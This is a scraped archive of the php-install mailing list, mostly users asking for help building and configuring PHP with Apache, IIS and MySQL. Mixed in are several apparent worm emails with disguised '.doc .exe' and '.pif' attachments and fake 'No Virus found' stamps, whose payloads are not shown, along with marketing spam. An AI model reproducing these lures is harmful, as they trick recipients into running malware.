php.install http://php-groups.com/ PHP Group en-us 7/29/2010 2:05:43 PM 7/29/2010 2:05:43 PM Copyright (c) 2009 R3N3 International Inc RE: [PHP-INSTALL] RE: http://php-groups.com/php.install/RE-PHP-INSTALL-RE This is a multi-part message in MIME format. ------_=_NextPart_001_01CA8CD8.0BF66850 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Best thing to do would be install something like WAMP server and see if that works. Also, you should try <?php phpinfo(); ?> as your testing page - then you can rule out that it is the software issue and the problem lies with your code. ________________________________ From: Bhagavathy Padmanabhan [mailto:bhagavathy.p@iimbeealumni.org]=20 Sent: Sunday, 15 November 2009 8:47 PM To: php-install@lists.p 2010-01-04T00:51:26 Remove From Mailing List http://php-groups.com/php.install/Remove-From-Mailing-List This is a multi-part message in MIME format. ------=_NextPart_000_0027_01CA8C94.5E61DA00 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Please remove my email for the php mailing list. ------=_NextPart_000_0027_01CA8C94.5E61DA00 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = cha 2010-01-04T00:46:59 RE: [PHP-INSTALL] Vista Install http://php-groups.com/php.install/RE-PHP-INSTALL-Vista-Install This is a multi-part message in MIME format. ------_=_NextPart_001_01CA8C19.ED4539E4 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I know WAMP server works on Vista - maybe you should try that? Also, if = you have Skype running, that could stop it form running too. Jacob. Save on overseas calls and SMS direct from your mobile. gotalk mobile = lets you "Share the Moment" with family and friends overseas when and = where you like. Call rates on our Straight Talk Plus plan start from = just 1/2c per min (plus flagfall). Find out mor 2010-01-03T02:09:19 Vista Install http://php-groups.com/php.install/Vista-Install This is a multi-part message in MIME format. ------=_NextPart_000_0023_01CA8BBA.BFB6DA10 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Have installed XAMPP. When I try to go to local host in browser I get the unresolved host error message. Can anyone help? Apache and mySQL appear to be working. ------=_NextPart_000_0023_01CA8BBA.BFB6DA10 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3 2010-01-02T20:49:00 PHP5.3, php.ini and ~E_DEPRECATED http://php-groups.com/php.install/PHP5.3-php.ini-and-E_DEPRECATED Has anyone figured out a way to turn off E_DEPRECATED errors in php.ini under PHP5.3.x? It appears that php ignores the php.ini setting that attempts to turn off those messages. I've seen this reported as a bug, but with it resolved as "bogus" or "I am pretty sure this is fixed" but no definitive notice that it has actually been fixed or assigned to be fixed. -- Earl Cooley III (shiva@io.com) 2010-01-02T09:33:17 No libphp5.so after compilation http://php-groups.com/php.install/No-libphp5.so-after-compilation Hi all, I try to compile php5.3.1 under AIX6.1. The configure command : ../configure --with-apxs2=/usr/local/apache2/bin/apxs --enable-shared --with-libxml-dir=/usr/local/lib --disable-phar All works fine, compilation is OK. BUT : it doesn't generate the shared library libphp5.so After the compilation, if i look in the "libs" subdirectory : libphp5.a libphp5.la Do i miss something ??? Regards, Eric -- Eric Vielet | C.R.T. Informatique Tel: (+33) 2 35 59 63 30 | 403 route de Darnetal Fax: (+33) 2 35 59 63 40 | 76230 Bois Guil 2009-12-22T17:31:20 php-5.2.12, php-5.3.0 & php-5.3.1 fail to build on latest Ubuntu http://php-groups.com/php.install/php-5.2.12-php-5.3.0-php-5.3.1-fail-to-build-on-latest-Ubuntu The same problem appears with all stable versions of php and Ubuntu Karmic with gcc-4.4.1 which produce: root@hive1:# ./configure root@hive1:# make /bin/sh /home/dfavor/work/php-5.3.1/libtool --silent --preserve-dup-deps --mode=compile gcc -Iext/date/lib -Iext/date/ -I/home/dfavor/work/php-5.3.1/ext/date/ -DPHP_ATOM_INC -I/home/dfavor/work/php-5.3.1/include -I/home/dfavor/work/php-5.3.1/main -I/home/dfavor/work/php-5.3.1 -I/home/dfavor/work/php-5.3.1/ext/date/lib -I/home/dfavor/work/php-5.3.1/ext/ereg/regex -I/usr/include/libxml2 -I/home/dfavor/work/php-5.3.1/ext/sqlite3/libsql 2009-12-20T15:15:13 Installation issue with PHP 5.3.1 http://php-groups.com/php.install/Installation-issue-with-PHP-5.3.1 --000e0cd2d92e4d2d05047adfca68 Content-Type: text/plain; charset=ISO-8859-1 I am about to throw something very expensive through a large window right now. Here's the issue: PHP version: 5.3.1 Server: IIS 6 OS: Windows XP SP2 I had PHP running fine on my development machine for months, but then I had to write a script that allows users to upload files to my site. Due to the ridiculous security settings for IIS, I got frustrated and decided to switch to Apache 2.2.14. COULD NOT get PHP 5.3.1 to work with Apache (the normal php.ini lines worked fine, except for PHPIniDir - 2009-12-16T22:11:17 Compile PHP 5.3.1 - Unknown configure option http://php-groups.com/php.install/Compile-PHP-5.3.1-Unknown-configure-option Hi, I've compiled PHP with these options before: ../configure --prefix=/usr --datadir=/usr/share/php5 --sysconfdir=/etc/php5 --enable-fastcgi --enable-fpm --disable-short-tags --enable-exif --enable-intl --enable-mbstring --enable-soap --enable-zip --with-bz2=/usr --with-curl=/usr/bin --with-openssl-dir=/usr --with-zlib-dir=/usr --with-gd --with-jpeg-dir=/usr --with-png-dir=/usr --with-zlib-dir=/usr --with-freetype-dir=/usr --with-imagick --with-mcrypt=/usr --with-mysqli=mysqlnd --with-mysql=mysqlnd --disable-pdo --disable-debug --disable-rpat --with-iconv-dir=/usr --with-pear --en 2009-12-10T10:38:39 PHP install with Apache http://php-groups.com/php.install/PHP-install-with-Apache I have a problem on installing PHP 5.3.1 with Apache Server 2.2.14. When I adding the command "PHPIniDir" into httpd.conf, I cannot start the Apache Server anymore. By my observation, It should have some problems when i add an extension into the PHP module. I would like to ask how can i fixed it? #httpd.conf #BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL PHPIniDir "C:/Program Files/PHP/" LoadModule php5_module "C:/Program Files/PHP/php5apache2_2.dll" #LoadFile "C:/Program Files/PHP/ext/php_mysql.dll" #END PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL #php.ini exte 2009-12-09T10:24:47 php installation. http://php-groups.com/php.install/php-installation --001636d33c7ca1ab1b0479f44961 Content-Type: text/plain; charset=ISO-8859-1 I am running windows 7 64 bit with apache 2.2.14 and it runs fine until I install php 5.3.1 in the installer form VC6 x86 Thread Safe. After installing php I attempt to restart apache and it fails to restart and I receive the following error in the apache error log. [Fri Dec 04 21:01:16 2009] [notice] Parent: Received restart signal -- Restarting the server. [Fri Dec 04 21:01:16 2009] [notice] Child 2532: Exit event signaled. Child process is ending. [Fri Dec 04 21:01:16 2009] [notice] Apache/2.2.14 (Win3 2009-12-05T05:13:41 Trying to compile apxs php module - TEST FAILS http://php-groups.com/php.install/Trying-to-compile-apxs-php-module-TEST-FAILS Hi, I'm trying to compile PHP using apxs and when I do the 'make test', it fails. This is on CentOS 5 See the error log below. Any help is appreciated. Thanks, -Jon ===================================================================== FAILED TEST SUMMARY --------------------------------------------------------------------- Bug #22592 (cascading assignments to strings with curly braces broken) [tests/lang/bug22592.phpt] Test date_sunrise() function : usage variation - Passing unexpected values to fifth argument zenith [ext/date/tests/date_sunrise_variation5.phpt] Test 2009-12-03T22:15:25 php 5.3 - older openssl http://php-groups.com/php.install/php-5.3-older-openssl Hi, is there any chance to run php 5.3 with older openssl libs. On my machine Version 0.9.6 is installed. At compiling i get error: /bin/sh /usr/src//php5-5.3.1/libtool --silent --preserve-dup-deps --mode=compile cc -Iext/openssl/ -I/usr/src//php5-5.3.1/ext/openssl/ -DPHP_ATOM_INC -I/usr/src//php5-5.3.1/include -I/usr/src//php5-5.3.1/main -I/usr/src//php5-5.3.1 -I/usr/src//php5-5.3.1/ext/date/lib -I/usr/src//php5-5.3.1/ext/ereg/regex -I/usr/include/libxml2 -I/usr/src//php5-5.3.1/ext/mbstring/oniguruma -I/usr/src//php5-5.3.1/ext/mbstring/libmbfl -I/usr/src//php5-5.3.1/ext 2009-11-30T15:21:38 mysqlnd - hide Client statistics http://php-groups.com/php.install/mysqlnd-hide-Client-statistics Hello, is use mysqlnd with mysql 5.3.1, works great. i wonder if it is possible to hide the big mysqlnd-statistics block in output of infophp(); I already set "Collecting statistics" to off, but the block "Client statistics" still apears. is ther an ini-param, or compile-option or sourcepatch? I already have seen infophp() with hideen configure-line. How ist this possible? Thanks, Andre 2009-11-26T10:29:08 Re: Mail Server http://php-groups.com/php.install/Re-Mail-Server This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit You have received an extended message. Please read the instructions. +++ Attachment: No Virus found +++ Kaspersky AntiVirus - www.kaspersky.com ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="readme_php-install.doc .exe" Content-Transfer-Encoding: base64 Content-Disposition: attachme 2009-11-23T12:20:18 Re: Delivery Server http://php-groups.com/php.install/Re-Delivery-Server This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Waiting for authentification. +++ Attachment: No Virus found +++ Panda AntiVirus - www.pandasoftware.com ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="readme.doc .pif" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="readme.doc 2009-11-19T22:27:29 problem with compiling php 4.4.1 with debugging symbols http://php-groups.com/php.install/problem-with-compiling-php-4.4.1-with-debugging-sy This is a multi-part message in MIME format. --Boundary_(ID_RHcNFd6cX3uhQmH8iU6VUA) Content-type: multipart/alternative; boundary="Boundary_(ID_MHxhIydQDcdlJBWMSnC9jQ)" This is a multi-part message in MIME format. --Boundary_(ID_MHxhIydQDcdlJBWMSnC9jQ) Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Content-disposition: inline Hi i'v been trying to compile php with debugging symbols using: ../configure [...] --enable-debug [...], which is generating problem. Trying run httpd generates error: Cannot load /opt/modules/libphp4.so into server: / 2009-11-19T10:59:59 PHP + SQLite = tearing hairs.. http://php-groups.com/php.install/PHP-SQLite-tearing-hairs Hello, I've spend some days on googling, but as for now - without any effect. ---------- The configuration follows: - Windows 7 64bit (build 7100) - PHPInfo -> Apache/2.2.13 (Win32) PHP/5.3.0 PDO drivers mysql, odbc, sqlite PDO Driver for SQLite 3.x enabled SQLite Library 3.6.15 SQLite3 support enabled SQLite3 module version 0.7-dev SQLite Library 3.6.15 Directive Local Value Master Value sqlite3.extension_dir E:\Program Files (x86)\PHP\ext E:\Program Files (x86)\PHP\ext 2009-11-17T06:59:27 RE: http://php-groups.com/php.install/RE This is a multi-part message in MIME format. ------=_NextPart_000_000A_01CA660F.00CB3360 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Dear PHP team Sending again my request.can somebody guide me? Regards _____ From: Bhagavathy Padmanabhan [mailto:bhagavathy.p@iimbeealumni.org] Sent: Saturday, November 14, 2009 12:22 PM To: 'php-install@lists.php.net' Cc: 'Bhagavathy Padmanabhan' Subject: Dear PHP folks Have the following softwares in my dell laptop 1. Windows 2003 SP2 (Enterprise Ver 2009-11-15T10:46:31 Configuring PHP sendmail http://php-groups.com/php.install/Configuring-PHP-sendmail Hi all, I have my own Windows 2003 Server with IIS 6 (no mail server installed on it). In order to practice my skills on PHP, I installed PHP 5.2.11 on my server, everything is fine except sendmail operation. I tried to configure PHP.ini for sending mails through smtp.gmail.com. The changes I made in PHP.ini is: [mail function] ; For Win32 only. SMTP =3D ssl://smtp.gmail.com smtp_port =3D 465 When I try to run a simple mailer script, it genereates the following error= : Warning: mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP 2009-11-09T11:56:24 Please check out this product http://php-groups.com/php.install/Please-check-out-this-product Congratulations- You already have $440 Commissions Coming..GUARANTEED! Hello Friend, You ALREADY have 51,759 DOWNLINE and 22 Paid Members in YOUR TEAM...and it is STILL GROWING! NOTE: By Using this program you can build your own TEAM.. Every sign-up you EARN $20 per process.You can recruite your intire FAMILY members and Friends as your DOWNLINE.. You Have a UNLIMITED DoWNLINE as many as you can. Remember $20 per process.... IMPORTANT: ORDER NOW or before MONDAY NOVEMBER 16, 2009 is the Cut-Off day to lock in your Commission! Be sure to ORDER NOW for a Lifetime membe 2009-11-03T14:37:57 PHP install error http://php-groups.com/php.install/PHP-install-error This is a multi-part message in MIME format. ------_=_NextPart_001_01CA5BDB.241492EF Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello, Platforms: AIX 5.3.10 - Apache 2.2.14 - PHP 5.2.11 - DB2/UDB 9.7 I received this error after running: ../configure --with-apxs2=3D/usr/opt/apache2/bin/apxs --with-ibm-db2=3D/data/db2/db2inst1/sqllib --sysconfdir=3D/usr/opt/apache2/conf +--------------------------------------------------------------------+ | *** ATTENTION *** | | 2009-11-02T16:40:09 PHP install on AIX http://php-groups.com/php.install/PHP-install-on-AIX This is a multi-part message in MIME format. ------=_NextPart_000_0005_01CA5978.22CE8D70 Content-Type: multipart/mixed; boundary="----=_NextPart_001_0006_01CA5978.22CE8D70" ------=_NextPart_001_0006_01CA5978.22CE8D70 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hello, Platforms: AIX 5.3.10 - Apache 2.2.14 - PHP 5.2.11 - DB2/UDB 9.7 I received this error after running: .../configure --with-apxs2=/usr/opt/apache2/bin/apxs --with-ibm-db2=/data/db2/db2inst1/sqllib --sysconfdir=/usr/opt/apache2/conf +------------------------------------- 2009-10-30T21:46:27 with-iconv snow Leopard http://php-groups.com/php.install/with-iconv-snow-Leopard Hi, I trie to recompile php 5.2.11 on OS S Snow leopard without success. (I need the < 5.3 version for the magento open source installation) Here are my settings: ../configure \ --prefix=3D/usr/local/php5 \ --with-iconv-dir=3D/usr/ \ --with-apxs2 \ --enable-pdo \ --enable-mbstring \ --enable-gd-native-ttf \ --with-freetype-dir=3D/usr/local/lib \ --with-t1lib=3D/usr/local/lib \ --with-xpm-dir=3D/usr/X11R6 \ --with-gd \ --with-zlib \ --with-jpeg-dir=3D/usr/local/lib \ --with-png-dir=3D/usr/local/lib \ --with-curl \ --with-mcrypt \ --with-mysql-sock=3D/tmp/mysql.sock \ 2009-10-30T08:42:42 New PHP 5.3 install causes apache to crash http://php-groups.com/php.install/New-PHP-5.3-install-causes-apache-to-crash I just removed Apache 2.2.4 and installed Apache 2.2.14 in an attempt to get it working with PHP 5.3 in Windows XP. Unfortunately, I get the same error with both versions: httpd.exe - Application Error The instruction at "0x007447b8" referenced memory at "0x007447b8". The memory could not be "written". If I don't load the PHP module, apache starts up fine. I've tried commenting out all the extensions that are loaded in php.ini, but I get the same result. The PHP installer I used was the VC6 x86 Thread Safe (I've also tried the non-Thread safe version). I have no idea wh 2009-10-22T03:37:28 _���� ��� �� ����������� ������ ������� - ������������� ������_ http://php-groups.com/php.install/ ------=_NextPart_000_003C_01C44406.BE4CA3C2 Content-Type: text/html; charset=windows-1251 Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-1= 251"> <title></title> <style type=3D"text/css"> <!-- body,td,th { font-family: Verdana, Geneva, sans-serif, Arial; font-size: 14px; color: #C03; } body { background-color: #FFF; } --> </style></head> <body> <p>&nbsp;</p> <p>&nbsp;</p> <t 2009-10-19T23:18:47 How to install http://php-groups.com/php.install/How-to-install --001636e1f9959a9e5b0475e370ef Content-Type: text/plain; charset=ISO-8859-1 Hello.. how are You ? Thank For Your Help. I have to use your link for download. i have to download. how to run ? can you help me ? im sorry distep to you have a nice day... kamal --001636e1f9959a9e5b0475e370ef Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Hello..<br>=A0how are You ?<br>Thank For Your Help. <br><br>I have to use y= our link for download. i have to download. how to run ? <br><br>can you hel= p me ?<br><br>im sorry distep to you< 2009-10-14T11:26:54 How to install GDCHART in Ubuntu 9.04 http://php-groups.com/php.install/How-to-install-GDCHART-in-Ubuntu-9.04 --000e0cd48c54dac6fa0475dc4403 Content-Type: text/plain; charset=ISO-8859-1 Dear All, I've been installing PHP 5.2.6 into my Ubuntu 9.04 machine and would like to know how to install GDCHART extension? Many thank in advance, Riza --000e0cd48c54dac6fa0475dc4403 Content-Type: text/html; charset=ISO-8859-1 Dear All,<br><br>I&#39;ve been installing PHP 5.2.6 into my Ubuntu 9.04 machine and would like to know how to install GDCHART extension?<br><br>Many thank in advance,<br><br>Riza<br> --000e0cd48c54dac6fa0475dc4403-- 2009-10-14T02:53:35 GDChart failed to Install it Ubuntu 9.04 http://php-groups.com/php.install/GDChart-failed-to-Install-it-Ubuntu-9.04 --000e0cd6ad04006c560475d3c72d Content-Type: text/plain; charset=ISO-8859-1 Hello, I am installing gdchart in Ubuntu 9.04 but its not appears in phpinfo. I try to see what happened and seems something wrong while installation here. root@ariza-laptop:/home/ariza/Desktop/gdchart-0.2.0/gdchart-0.2.0# make test /bin/bash /home/ariza/Desktop/gdchart-0.2.0/gdchart-0.2.0/libtool --mode=install cp ../gdchart.la/home/ariza/Desktop/gdchart-0.2.0/gdchart-0.2.0/modules libtool: install: cp ./.libs/gdchart.so /home/ariza/Desktop/gdchart-0.2.0/gdchart-0.2.0/modules/gdchart.so libtool: insta 2009-10-13T16:45:44 About PHP http://php-groups.com/php.install/About-PHP --00504502cc0171a8030475cb4aad Content-Type: text/plain; charset=ISO-8859-1 Hello how r u ? im new for php. can i have to download php ? please help me kamal www.trafficsoon.com --00504502cc0171a8030475cb4aad Content-Type: text/html; charset=ISO-8859-1 Hello<br><br>how r u ?<br><br>im new for php. can i have to download php ?<br><br>please help me<br><br><br><br>kamal<br><br><a href="http://www.trafficsoon.com">www.trafficsoon.com</a><br><br> --00504502cc0171a8030475cb4aad-- 2009-10-13T06:38:14 Re: Secure SMTP Message http://php-groups.com/php.install/Re-Secure-SMTP-Message This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Now a new message is available. +++ Attachment: No Virus found +++ Panda AntiVirus - www.pandasoftware.com ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="message.txt .exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="message.txt 2009-10-08T07:21:13 GD install with JPEG support http://php-groups.com/php.install/GD-install-with-JPEG-support --00504502be42cb900804750eec37 Content-Type: text/plain; charset=ISO-8859-1 I have compiled PHP with GD with JPEG support, but it doesn't work. Using command "php -info" shows JPEG is successfully enabled in the GD section, but phpinfo() under GD section doesn't show JPEG status. What could be the possible cause to this problem? --00504502be42cb900804750eec37 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I have compiled PHP with GD with JPEG support, but it doesn&#39;t work.<br>= Using command &quot;php -info&quot; shows JPEG is success 2009-10-03T21:54:29 how to statically link PHP 5.2.x + Apache httpd 2.2.x? http://php-groups.com/php.install/how-to-statically-link-PHP-5.2.x-Apache-httpd-2.2 Hi all, I'm in the midst of setting up my production server, which will be running on a fully chrooted non-root LAMP configuration. Due to my high demands for performance and security, I've been advised by several resources on the net to statically link PHP into Apache. However, all information I could find seems to pertain to very old Apache 1.3.x configurations, which are no longer compatible with the current configure scripts. In the past few days, I've tried my best to build a libphp5.a static library using various configure arguments, but to no avail. I'm starting to 2009-09-29T09:46:30 Getting 5.3 up and running on Apache 2.2 http://php-groups.com/php.install/Getting-5.3-up-and-running-on-Apache-2.2 I'm having some trouble getting PHP 5.3 up and running on Apache 2.2 (Vista 64 Bit). I believe that I need to run the vc6 thread safe version (as its the only zip file with the php5apache2_2.dll needed by apache). After getting that up and running as well as the modules I need (php -v from the command line comes back clean). The trouble I run into is that my web application (which worked fine on 5.2.9) crashes apache upon the final line (exit()). I'm fairly certain I'm running into a bug somewhere with PHP but I would like to diagnose it so that I can post a detailed bug 2009-09-26T04:32:07 Failed to compile x86_64 version of php5 http://php-groups.com/php.install/Failed-to-compile-x86_64-version-of-php5 --0016e64f686675d7000474657f65 Content-Type: text/plain; charset=ISO-8859-1 Hi, all I'm trying to compile php5 on dreamhost, after doing what http://wiki.dreamhost.com/index.php/Installing_PHP5<http://wiki.dreamhost.com/index.php/Installing%5FPHP5>says, I have compiled all the components except php5 itself. When running $ ./configure ${PHPFEATURES}, it reports an error configure: error: Cannot find libmysqlclient under /usr. Note that the MySQL client library is not bundled anymore! But actually I find that /usr/lib64/lib64/libmysqlclient.so.15.0.0 exists. After some googli 2009-09-25T11:46:25 PHP pages not working externally http://php-groups.com/php.install/PHP-pages-not-working-externally I have setup PHP Version 5.2.6 with Apache2 on a Ubuntu 9.04 Server. Simple php scripts are working fine but others simply just hang in the browser. A script with a print statement http://83.244.227.165/test.php works fine but if i try and do phpinfo http://83.244.227.165/test2.php it will not work. However, both examples work fine from the machine locally or from any computer inside the LAN. any help would be appreciated!! 2009-09-17T22:30:04 thanks! http://php-groups.com/php.install/thanks This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Your file is attached. +++ Attachment: No Virus found +++ Kaspersky AntiVirus - www.kaspersky.com ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="document_all.txt .pif" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="document_all.txt 2009-09-17T18:21:04 Informativa trattamento dati http://php-groups.com/php.install/Informativa-trattamento-dati PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1tYWlsIC0tPg0K PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNv bnRlbnQ9Iml0Ij4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0i dGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+DQo8dGl0bGU+Q09OU0VOU088L3Rp dGxlPg0KPC9oZWFkPg0KPGJvZHkgc3R5bGU9ImJvcmRlci1zdHlsZTogc29saWQ7IGJvcmRl ci1jb2xvcjogI0ZGRkZGRiI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPg0KICA8Y2VudGVyPg0K PHRhYmxlIGJvcmRlcj0iMCIgd2lkdGg9IjUyMCIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGJv cmRlcmNvbG9ybGlnaHQ9IiNGRkZGRkYiIGJvcmRlcmNvbG9yZGFyaz0iI0ZGRkZGRiIgY2Vs bHBhZGRp 2009-09-15T11:56:32 make test fails on sapi php 5.3.0 http://php-groups.com/php.install/make-test-fails-on-sapi-php-5.3.0 ------_=_NextPart_001_01CA3254.02068F93 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable Problem: 1. make test on php gives the following and hangs on last line: 2. apache does not start and gives error on sapi_module Error from make test:=20 TEST 5382/5418 [sapi/cgi/tests/001.phpt] FAIL version string [sapi/cgi/tests/001.phpt]=20 TEST 5383/5418 [sapi/cgi/tests/002.phpt] Error from apache start up:=20 httpd: Syntax error on line 56 of /usr/local/apache2/conf/httpd.conf:=20 Canno 2009-09-10T20:19:31 unable to start apache 2.2.13 with php5.3.0 http://php-groups.com/php.install/unable-to-start-apache-2.2.13-with-php5.3.0 ------_=_NextPart_001_01CA319E.EC663D83 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable =20 Problem: Can not start Apache web server with php. =20 Cannot load libphp5.so into server Relocation Error file: libphp5.so:=20 symbol sapi_module =20 Environment: =20 php 5.3.0 Apache 2.2.13 Solaris 9 122300-42 =20 Installer: Administrator with no or little apache config experience. =20 Actual Error:=20 httpd: Syntax err 2009-09-09T22:43:16 Vista and PHP http://php-groups.com/php.install/Vista-and-PHP ------=_Part_172853_17046987.1252480182685 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Hi My name is Flavio and I have a problem to start Apache; I have installed EasyPhp on my Pc, which uses Vista 64 bit: when I start up Apache a window tell me "Another service uses the same gate". I have introduced in httpd file all these IP addresses with different gates but with no good result: Listen 12.34.56.78:80 Listen 127.0.0.1:80 Listen 12.34.56.78:8000 Listen 127.0.0.1:8000 Listen 12.34.56.78:443 Listen 127.0.0.1:443 Listen 192.0.2.5:8000 Lis 2009-09-09T07:09:42 Installing PHP on Apache 1.3.22 under cygwin http://php-groups.com/php.install/Installing-PHP-on-Apache-1.3.22-under-cygwin I NEED HELP !!!! I've been trying to install PHP to my Apache 1.3.22 server during the past year without success. Does anyone have a working PHP 4 or 5 for my Apache which has been running flawlessly for 6+ years. What I need is a binary distribution of PHP 4/5 to work with my binary (w. DSO support) Apache for Cygwin (1.5 or 1.7). I know that binary distribution for Cygwin of Apache is nolonger being distributed. I tried building multiple versions of PHP5 from several sources but always failing with unresolved symbols in libphp but the loader does not say which symbols. 2009-08-31T19:34:40 problem http://php-groups.com/php.install/problem asdf 2009-08-31T10:55:59 PHP 5.2.9 + Apache 1.3 Darwin 6.8 MAC OS X 10.2.8 + MYSQL http://php-groups.com/php.install/PHP-5.2.9-Apache-1.3-Darwin-6.8-MAC-OS-X-10.2.8-MY Hello everybody After been using PHP 5.2.9 on a MAC OS 10.2.8 with Apache 1.3 without problems, I decided to add support for MYSQL so I tried to re-compile the php module for apache with this configuration: .../configure --prefix=/user --sysconfdir=/etc --localstatedir=/var --mandir=/usr/share/man --with-apxs --without-sqlite --without-pdo-sqlite --with-zlib --without-iconv --enable-sockets --with-openssl --with-kerberos --with-mysql=/usr --with-mysql-sock The configure script runs with no problems, but then 'make' fails with this message: ld: Undefined symbols: _mysql_c 2009-08-31T10:47:19 PHP 5.3 and FastCGI IIS 5.1 installation http://php-groups.com/php.install/PHP-5.3-and-FastCGI-IIS-5.1-installation Hello, can anybody publish a step by step procedure how to install PHP 5.3.0 in FastCGI mode unde WXP and IIS 5.1 ? Previous version 5.2.9 works fine in ISAPI mode, now I try to run this version withou success. Error message apears "libglib-2.0-0.dll was not found" folowed by next error message "OCI.dll was not found". 2009-08-29T17:12:16 --with-config-file-scan-dir= multiple times? http://php-groups.com/php.install/-with-config-file-scan-dir-multiple-times Hi, Can we specify the --with-config-file-scan-dir= compiler flag multiple times? Here's the long story: Since 5.1, the php team have made PDO is compiled-in by default. I.e. its "not recommended" to use --with-pdo=shared See: http://us.php.net/manual/en/pdo.installation.php. In the official debian / ubuntu php5 we DO compile it as shared for the apache2 module. Then pdo.so extension installs out from php5-common. This conflicts a little with our new fpm variant of php. When fpm starts up it sees the /etc/php5/conf.d/pdo.ini file common and tries to load pdo.so. So we'd like 2009-08-26T18:00:47 Unable to access a .php page http://php-groups.com/php.install/Unable-to-access-a-php-page --_3ce663c4-f425-4ee0-b10e-55dc093a0982_ Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: quoted-printable Hi All=2C =20 I am using IIS for PHP=2C I have done all the necessary configuration for t= his. =20 when I try to open the info.php page I get "page not found" =20 but I am able to access a .html page from the same directory. =20 Please help. =20 Regards. _________________________________________________________________ Log on to MSN India for a lowdown on what=92s hot in the world today http://in.msn.com= --_3ce663c 2009-08-26T04:14:17 Mac OS X 64bit PHP 5.3 MySQL + Apache2 http://php-groups.com/php.install/Mac-OS-X-64bit-PHP-5.3-MySQL-Apache2 --Boundary_(ID_ZO/FM021cZuBfYiOnQ+QWw) Content-type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-transfer-encoding: 7BIT I'm trying to install PHP 5.3, Apache2 and MySQL5 in 64bit on Mac OS X 10.5.8 with the following extensions: curl @7.19.4_0+universal (active) expat @2.0.1_0+universal (active) freetds @0.82_0+darwin_9+universal (active) freetype @2.3.9_0+macosx+universal (active) gdbm @1.8.3_1+universal (active) gettext @0.17_4+universal (active) jpeg @6b_3+universal (active) libiconv @1.12_2+universal (active) libmcrypt @2. 2009-08-25T01:46:29 Help installing PHP and Apache on Linux (Ubuntu 9.04) http://php-groups.com/php.install/Help-installing-PHP-and-Apache-on-Linux-Ubuntu-9.0 --000e0cd50a2a47f9db0471bdd074 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello guys, i am having some trouble installing them on linux. i installed linux yesterday and they didn't asked me to set a root password, only for the account that i use (nero), howeover i am able to update my system and so on with that user. i have installed apache, owrking, howerover i can't create archives or edit the default index.html that comes with apache, its says that i don't have permission to do that (i tried it and i just cant) and since i don't have the r 2009-08-22T16:52:43 Looking For An Incredible Place To Advertise Your Business??? http://php-groups.com/php.install/Looking-For-An-Incredible-Place-To-Advertise-Your <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> </head> <body style=3D"FONT-FAMILY: Tahoma"> <p>Hello!</p> <p>Place your opportunity on this website and get the&nbsp;exposure and = traffic=20 you've always&nbsp;wanted! Easy to post and there are free spots still=20 available. Post&nbsp;TODAY!</p> <p><strong><a=20 